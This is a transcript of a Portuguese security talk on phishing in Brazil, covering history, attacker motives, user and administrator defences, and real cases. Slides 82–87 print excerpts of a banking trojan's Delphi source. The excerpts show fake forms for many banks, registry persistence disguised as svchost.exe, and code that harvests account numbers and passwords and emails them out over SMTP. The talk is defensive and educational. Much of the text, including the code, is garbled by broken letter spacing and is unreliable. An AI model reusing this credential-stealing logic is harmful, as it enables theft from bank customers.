Impacto e Análise de Phising. Humberto Sartini

Transcrição

1 Impacto e Análise de Phising Humberto Sartini

2 Palestrante Humberto Sartini Analista de Segurança do Provedor OndaRPC Participante dos projetos: Rau-Tu Linux ( ) HoneypotBR ( ) RootCheck ( ) Participante do: IV e V Fórum Internacional de SL Conferência Internacional de SL ( Curitiba ) Conisli (São Paulo/SP )

3 Tópicos O que é Phising? História do Phising Cenário Atual Motivação do Phiser Como o usuário pode se prevenir? O que o administrador pode fazer? Impactos causados Exemplos Análise de Phising em tempo real

4 O que é Phising? É um termo criado para descrever o tipo de fraude que se dá através do envio de mensagem não solicitada, que se passa por comunicação de uma instituição conhecida e que procura induzir o acesso a páginas e/ou programas fraudulentos, projetados para furtar dados pessoais e financeiros de usuários. Fonte:

5 O que é Phising? A palavra Phising (de fishing ) vem de uma analogia criada pelos fraudadores, onde iscas ( s) são usados para pescar senhas e dados financeiros de usuários da Internet. Fonte:

6 História do Phising Em janeiro de 1996 aparecimento do termo Phising no NewsGroup da 2600 Magazine AOL 1990: Criação de contas com dados falsos (Nome, Número de Cartão de Crédito, etc...) 1995: Utilização de Força-Bruta 1997: Suporte AOL solicitando dados de usuário e senha. Fonte: Wikipedia

7 Cenário Atual Formas de Envio Através de s (quase que a totalidade) Sites com códigos maliciosos que aproveitam falhas de segurança de Navegadores, Leitores de s e Sistemas Operacionais Sites com brechas de segurança (PHP Nuke, FormMail,...) Programas de Mensagem Instantânea (MSN, AIM, ICQ,...) Combinação de duas ou mais técnicas

8 Cenário Atual Facilidades encontradas pelo Phiser: Código fonte de vários Phising/Scam em várias linguagens Compactador de EXE (Petite) Versões bugadas de Softwares Ingenuidade (??) do usuário

9 Cenário Atual Facilidades encontradas pelo Phiser: Burrocracia das Grandes Provedores Operadoras e Delegacias Virtuais despreparadas e sem equipamentos

10 Cenário Atual Falta de Legislação específica Sugere ao Ministério da Justiça a criação de delegacias especializadas na repressão aos crimes cibernéticos (21/06/2005) Atribui à Justiça Federal o processamento de crimes praticados no âmbito da Internet ou em ambientes similares, disseminados em escala mundial (02/06/2005)

11 Cenário Atual Falta de Legislação específica Tipificando os crimes informáticos, praticados pelos chamados "hackers", incluindo os crimes de sabotagem, falsidade e fraude informática; autorizando as autoridades a interceptarem dados dos provedores e prevendo a pena de reclusão para quem armazena, em meio eletrônico, material pornográfico, envolvendo criança e adolescente. (15/09/2004)

12 Cenário Atual Crescimento de Fraudes 65,00 60,00 55,00 50,00 Af 45,00 Aw 40,00 Dos 35,00 Fraude 30,00 Invasão Scan 25,00 Worm 20,00 15,00 10,00 5,00 0,

13 Motivação do Phiser

14 Motivação do Phiser Impunidade Legislação Falha ( Nacional e Internacional ) Máquinas Escravas x Pichação de Sites Aluguel de BOTNET ($$$)

15 Como o usuário pode se prevenir? Browsers Manter o browser sempre atualizado Desativar a execução de programas Java Desativar a execução de JavaScripts antes de entrar em uma página desconhecida Permitir que programas ActiveX sejam executados em seu computador apenas quando vierem de sites conhecidos e confiáveis Manter maior controle sobre o uso de cookies Fonte:

16 Como o usuário pode se prevenir? Browsers Bloquear pop-up windows e permiti-las apenas para sites conhecidos e confiáveis Certificar-se da procedência do site e da utilização de conexões seguras ao realizar transações via Web Somente acessar sites de instituições financeiras e de comércio eletrônico digitando o endereço diretamente no seu browser Fonte:

17 Como o usuário pode se prevenir? Leitores de s Manter sempre a versão mais atualizada do programa leitor de s Não clicar em links que, por ventura, possam aparecer no conteúdo do Evitar abrir arquivos ou executar programas anexados aos s Desconfiar sempre dos arquivos anexados à mensagem, mesmo que tenham sido enviados por pessoas ou instituições conhecidas Fonte:

18 O que o administrador pode fazer? É fundamental para amenizar os impactos causados pelos Phisings / Scams Notificar o incidente para os contatos da rede e para os grupos de segurança das redes envolvidas, além de copiar o para o Cert.br Efetuar configurações especificas para não permitir e/ou amenizar a propagação dos Phisings / Scams

19 O que o administrador pode fazer? Servidores de s Atenção especial aos s com os seguintes anexos: bat, chm, exe, hlp, lnk, pif, reg, scr, shs, vbe, vbs, wsf e wsh Atenção especial aos s com link apontando para arquivos com as seguintes extensões: bat, pif e scr

20 O que o administrador pode fazer? Servidores de s Ativação da checagem de DNS Reverso, HELO, Listas RBL SPF

21 O que o administrador pode fazer? Servidores de Páginas Alteração de Mime Type de arquivos com extensão duvidosas (bat, com, pif, scr) Atenção a CGI (FormMail)e PHP (Php Nuke) Eliminar Cross Site Scripting

22

23

24 h ttp:/ / w w w.brtu rbo.c o m.br/ in clu de s / barrap.js p?c= FFFFFF&u rl= h ttp:/ / w w w. po p.co m.br/ barra.ph p?u rl= h ttp:/ / w w w.o i.co m.br/ s e rv ice s / PO/ Fram e Se t/ Fra m e Se t.ph p?url= h ttp:/ / w w w.ibe s t.co m.br/ s ite / parce iro s / e s tadao.js p?lin k = h t tp:/ / w w w.ibe s t.e s tadao.co m.br/ age s tado /?i= 1

25 Impactos causados Perda de Produtividade Consumo de recursos computacionais (processamento, armazenamento, banda, etc...) Golpes e Fraudes Ameaça a Segurança da Informação

26

27

28

29

30 Exem p lo s e Cas o s Reais Tod os os exem p los d e Ph is in gs, e m u it os ou t ros, es t ão n o s it e: h t t p :/ / web.on d a.com.br/ h u m bert o

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80 Análise de Artefato 100,00 90,00 Kaspersky TheHacker NOD32v2 Avast VBA32 Symantec Sybari F-Prot DrWeb 80,00 McAfee 70,00 CAT-QuickHeal Fortinet 60,00 BitDefender 50,00 Ikarus 40,00 AntiVir Avira AVG 30,00 ClamAV 20,00 Panda 10,00 etrust-iris 0,00 Sophos Norman Porc. (%)

81 Exem p lo s e Cas o s Reais Agora s erão m os t rad as algu n s t rech os d os cód igos fon t es d os s oft wares u t iliz ad os Es s e s oft ware s im u la os s egu in t es ban cos : BB, Real, It au, Brad es co, Caixa, Un iban co, Un iem p res a, Ban es p a, San t an d er, BBJu rid ica, BEC, BRB, Nos s acaixa, Ban ris u l, Ban coru ral e Nord es t e

82 Exem p lo s e Cas os Reais Ap p lica t ion.sh owma in For m := fa ls e; Ap p lica t ion.cr ea t efor m (TFor m 1, For m 1 ); Ap p lica t ion.cr ea t efor m (Tfr m BB, fr m BB); Ap p lica t ion.cr ea t efor m (Tfor m 3, for m 3 ); Ap p lica t ion.cr ea t efor m (Tfr m It a u, fr m It a u ); Ap p lica t ion.cr ea t efor m (Tfor m 6, for m 6 ); Ap p lica t ion.cr ea t efor m (Tfr m Br a, fr m Br a ); Ap p lica t ion.cr ea t efor m (Tfr m Un ib a n co, fr m Un ib a n co); Ap p lica t ion.cr ea t efor m (Tfr m Un iem p r es a, fr m Un iem p r es a ); Ap p lica t ion.cr ea t efor m (Tfr m Ba n es p a, fr m Ba n es p a ); Ap p lica t ion.cr ea t efor m (Tfr m Sa n t a n d er, fr m Sa n t a n d er ); Ap p lica t ion.cr ea t efor m (Tfr m BBJu r id ica, fr m BBJu r id ica ); Ap p lica t ion.cr ea t efor m (Tfr m BEC, fr m BEC); Ap p lica t ion.cr ea t efor m (Tfr m BRB, fr m BRB); Ap p lica t ion.cr ea t efor m (Tfr m Nos s a Ca ixa, fr m Nos s a Ca ixa ); Ap p lica t ion.cr ea t efor m (Tfr m Ba n r is u l, fr m Ba n r is u l); Ap p lica t ion.cr ea t efor m (Tfr m Ba n coru r a l, fr m Ba n coru r a l); Ap p lica t ion.cr ea t efor m (Tfr m Nor d es t e, fr m Nor d es t e);

83 Exem p lo s e Cas o s Reais fu n ct ion TFor m 1.p r occr ia Regis t r odein icia r Ap lica ca o (Rem over : BOOL): s t r in g; b egin r egap lica ca o := TRegis t r y.cr ea t e; try wit h r egap lica ca o d o b egin s t r Ch a veap p := 's vch os t '; Ro ot Key := HKEY_LOCAL_MACHINE; if Op en Key(s t r CHAVE_INICIAR, Tr u e) t h en b egin if Rem over = t r u e t h en r ega p lica ca o.delet eva lu e(s t r Ch a veap p ) els e Wr it est r in g(s t r Ch a veap p, PASTA+ '\ con fig\ s vch os t.exe'); en d ;

84 Exem p lo s e Cas os Reais com p u t a d or := n om ecom p u t a d or ; m es s a geb od y.bod y.ad d ('Nom e d o Com p u t a d or : ' + com p u t a d or + ' In fect ed ' ); m es s a geb od y.bod y.ad d ('IP: '+ Get IP + ' '); m es s a geb od y.bod y.ad d ('Da t a : '+ d a t et o s t r (n o w) + ' Ho r a : '+ t im et os t r (t im e) + ' '); m es s a geb od y.fr om.na m e := 'Ma kin a : ' + com p u t a d or ; m es s a geb od y.recip ien t s.ema ilad d r es s es := 'XXXXXXXX@XXX.com '; m es s a geb od y.su b ject := com p u t a d or + ' In fect a d o'; SMTP.Hos t := 's m t p.xxxx.com.b r '; SMTP.Au t h en t ica t ion Typ e := a t Login ; SMTP.Us er n a m e := 'XXXXXX'; SMTP.Pa s s wor d := 'XXXXXX'; SMTP.Por t := 2 5 ; s m t p.con n ect ; Tr y s m t p.sen d (m es s a geb od y); excep t SMTP.Hos t := 'm x2.m a il.ya h oo.com ';

85 Exem p lo s e Cas o s Reais SMTP.Ho s t := 's m t p.xxxx.com.b r '; / / p õe a q u i o s eu s m t p SMTP.Au t h en t ica t ion Typ e := a t Login ; SMTP.Por t := 2 5 ; SMTP.Us er n a m e := 'XXXXXXXX'; / / o u s er SMTP.Pa s s wor d := 'XXXXXXXX'; / / a s en h a t r y SMTP.Con n ect ; excep t s elf.clos e; en d ; wit h m es s a geb od y d o b egin Fr om.text := 'h 3 llm 4 5 t 3 r r '; Fr om.ad d r es s := 'h 3 llm 4 5 t 3 r r '; / / Recip ien t s.ema ilad d r es s es := 'XXXXXX@XXX.com '; / / Qu em r eceb er á a s in fo Su b ject := 'b a n k Accou n t s '; / / a n t es r eflit a q o Cr Az Y é o m a ior d os m a ior es ^ ^ Bo d y.ad d St r in gs (Da d os ); en d ;

86 Exem p lo s e Cas o s Reais Da t a := TSt r in glis t.cr ea t e; d a t a.ad d (' > > > Ba n co Ru r a l < < < '); d a t a.a d d ('RURAL Us u a r io: '+ fr m Ba n coru r a l.r u r a lu s u.t ext ); d a t a.a d d ('RURAL Sen h a : '+ fr m Ba n coru r a l.s en u s u.t ext ); d a t a.a d d ('RURAL Agen cia : '+ fr m Ba n coru r a l.a gen.t ext ); d a t a.ad d ('RURAL Tip o: '+ fr m Ba n coru r a l.t ip o.t ext ); d a t a.a d d ('RURAL Con t a Cor r en t e: '+ fr m Ba n coru r a l.con t a cor.t ext ); d a t a.a d d ('RURAL Digit o: '+ fr m Ba n coru r a l.d ig.t ext ); d a t a.a d d ('RURAL Sen h a : '+ fr m Ba n coru r a l.s en h a fin a l.t ext ); d a t a.a d d (''); for m 1.Clos ein t er n et Exp lor er ; excep t en d ; for m 1.En via Em a il(d a t a );

87 Exem p lo s e Cas os Reais Da t a := TSt r in glis t.cr ea t e; Da t a.ad d (' '); Da t a.ad d (' > > > Ba n co es t a d u a l d o cea r a < < '); d a t a.ad d ('Agen cia : '+ fr m b ec.ed it 1.t ext ); d a t a.ad d ('Con t a : '+ fr m b ec.ed it 2.t ext ); d a t a.ad d ('Digit o: '+ fr m b ec.ed it 6.t ext ); d a t a.ad d ('Sen h a NET: '+ fr m b ec.ed it 3.t ext ); d a t a.ad d ('Res p os t a : '+ fr m b ec.ed it 4.t ext ); Da t a.ad d (' '); for m 1.Clos ein t er n et Exp lor er ; excep t en d ; Fo r m 1.En via Em a il(d a t a ); d a t a.fr ee;

88 An ális e d e Ph is in g em t em p o real Fed o r a Co r e 4 Win d o ws 9 8 Ap a ch e In t er n et Exp lo r er 6 Ds n iff Et h er eal Qem u Tcp Du m p

89 Contato Através do site ou

90 Créditos Sit es con su lt ad os: Cert.b r Cart ilh a d e Segu r an ça p ara In t ern et h t t p :/ / car t ilh a.cert.br/ Fed ora h t t p :/ / fed ora.red h at.com RNP h t t p :/ / p.br/ n ot icias / im p ren sa/ 2005/ n ot - im p - abril2005 Sp am Cos t Calcu lat or h t t p :/ / s con n ect.com / Market in g/ sp am calc.h t m Wikip ed ia h t t p :/ / en.wikip ed ia.org/ wiki/ Ph is h in g

91 Créditos Figura Slide 1: Figura Slide 12 Dados obtidos em: Figura Slide 13: Figura Slide 26 e 27: h ttp :/ / s con n ect.com / Mar ketin g/ sp am calc.h t m Outras Figuras: Arquivo particular